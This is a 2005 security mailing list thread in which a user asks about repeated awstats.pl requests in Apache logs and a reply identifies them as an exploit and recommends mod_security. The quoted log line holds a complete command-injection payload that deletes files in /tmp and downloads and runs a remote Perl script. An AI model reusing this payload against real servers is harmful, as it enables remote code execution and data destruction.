Security Basics mailing list archives

Re: GET //awstats.pl? in apache logs

From: ilaiy <ilaiy.e () gmail com>
Date: Mon, 24 Oct 2005 09:24:24 -0500

It is a awstats.pl exploit .. Try installing
http://www.modsecurity.org/

./thanks
ilaiy
On 10/21/05, Konstantine <listclient () gmail com> wrote:

My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET 
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1

Current thread:

GET //awstats.pl? in apache logs Konstantine (Oct 24)
- Re: GET //awstats.pl? in apache logs ilaiy (Oct 24)
- Re: GET //awstats.pl? in apache logs Andreas Constantinides (MegaHz) (Oct 24)
- Re: GET //awstats.pl? in apache logs FocusHacks (Oct 24)
- Re: GET //awstats.pl? in apache logs Can't dig that daddy (Oct 24)
  - RE: GET //awstats.pl? in apache logs mail list (Oct 24)
    - Message not available
    - Fwd: GET //awstats.pl? in apache logs Tobias Hahn (Oct 25)
- Re: GET //awstats.pl? in apache logs S.A. Birl (Oct 24)
  - Re: GET //awstats.pl? in apache logs Konstantine (Oct 25)
- <Possible follow-ups>
- Re: GET //awstats.pl? in apache logs [a] (Oct 24)